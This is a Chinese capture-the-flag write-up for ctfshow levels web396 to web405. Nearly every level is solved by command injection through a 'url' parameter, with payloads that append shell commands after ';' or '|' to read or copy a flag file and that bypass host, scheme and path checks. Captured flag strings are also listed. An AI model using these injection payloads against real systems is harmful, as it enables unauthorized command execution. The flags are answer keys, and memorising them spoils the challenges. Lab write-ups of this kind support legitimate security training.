目录
1、web396
2、web397
3、web398
4、web399
5、web400
6、web401
7、web402
8、web403
9、web404
10、web405
1、web396
直接截断重定向就可以了
?url=127.0.0.1/123;ls > 1.txt
?url=127.0.0.1/123;cp fl0g.php flag.txt
拿到 flag:ctfshow{cf281f26-9c89-4800-8e68-7863e2b4a835}
2、web397
没什么影响,上一题方法可用
直接 cat 内容
?url=127.0.0.1/123;cat fl0g.php > 2.txt
拿到 flag:ctfshow{4b924028-5592-4509-ad24-34ff66c1065b}
3、web398
上过滤了,换个管道符截断即可,payload:
?url=127.0.0.1/123|cat fl0g.php > 2.txt
其实它根本都有没过滤到我们,就用分号也是可以的
flag:ctfshow{eb05151d-c00c-4c2a-8cf5-72a47f889d85}
4、web399
它只是单纯在 host 里面过滤,payload:
?url=127.0.0.1/123;cat fl0g.php > 2.txt
5、web400
还在水我
payload:
?url=127.0.0.1/123;cat fl0g.php > 2.txt
6、web401
payload:
?url=127.0.0.1/123;cat fl0g.php > 2.txt
7、web402
会检测 scheme ,可是我压根都没传它啊,还是用前面的 payload:
?url=127.0.0.1/123;cat fl0g.php > 2.txt
8、web403
使用正则验证 host 是否为有效的 ip 地址,我们前面一直传的 127.0.0.1 肯定是有效的
但是这里会解析 scheme ,我们传入 http:// 即可,payload:
?url=http://127.0.0.1/123;cat fl0g.php > 2.txt
9、web404
环境没有开启成功,后面能开了再看。
10、web405
host 为有效 IP ,scheme需要包含 ~或者.或者php,path以/开头并且只包括字母数字
构造符合要求的 payload:
?url=http.://127.0.0.1;cat fl0g.php > 3.txt;/2
当然还可以用其他的
flag: ctfshow{1d55b3c9-5b66-42b1-b902-1914f4eebe14}